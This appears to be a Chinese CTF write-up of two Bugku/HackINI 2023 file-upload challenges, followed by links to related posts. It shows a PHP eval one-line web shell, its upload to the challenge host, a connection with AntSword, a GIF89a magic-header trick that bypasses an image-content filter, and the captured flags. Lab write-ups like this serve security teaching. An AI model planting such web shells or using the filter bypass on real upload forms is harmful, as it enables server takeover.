Bugku - 2023 HackINI Upload0 与 2023 HackINI Upload1 详解

目录

前置知识

解题过程

Upload0

Upload1

总结


前置知识

网络安全-文件上传漏洞-CSDN博客

解题过程

Upload0

打开靶场

根据题目还有页面可可以知道是文件上传漏洞,抓包或者插件可以看到是php环境,

尝试,构造一句话木马1.php文件如下:

复制代码
<?php
eval($_POST['shell']);
?>

上传成功,点击here可看到路径

复制代码
http://49.232.142.230:13942/uploads/63b4f3f6cd42bc4d2384208bef372ef4/1.php

直接蚁剑连接即可

连接成功

在根目录下的flag.txt可查看flag

复制代码
shellmates{s1Mp1E_PHP_Fi1E_up1o4D_tO_W4rMUp}

Upload1

在Upload0的基础上增加了一定的过滤,检测了文件内容是否为图片。

我们增加GIF89a图片魔术头,即可伪装文件为图片,直接构造2.php文件如下:

复制代码
GIF89a
<?php
eval($_POST['shell']);
?>

其他步骤同Upload0相同,不再赘述

复制代码
shellmates{PoLyg10t_F1l3s_Byp4$S}

总结

Upload0没有任何过滤的基础php文件上传漏洞

Upload1增加了基础的文件内容检测

相关推荐
2601_963771373 小时前
How to Scale Your WordPress Store Traffic in 2026
前端·php·plugin
白帽小阳6 小时前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
右耳朵猫AI6 小时前
PHP周刊2026W28 | 安全更新、Laravel 13.18、Twig 3.28
开发语言·php·laravel
罗政7 小时前
PDF 批量合并工具:本地 AI 自动排序、识别正文日期与合同编号
数据库·pdf·php
白帽小阳7 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
糖果店的幽灵8 小时前
安全测试从入门到精通_网络基础与HTTPS
网络·https·php
2601_963771379 小时前
WordPress SEO Guide: Boost Rankings Without Technical Jargon
前端·php
日取其半万世不竭12 小时前
CS2 服务器搜不到?GSLT、端口和启动参数逐项检查
运维·服务器·php
HackTwoHub13 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
360智汇云14 小时前
一次Redis超时引发的“冤案“
数据库·redis·php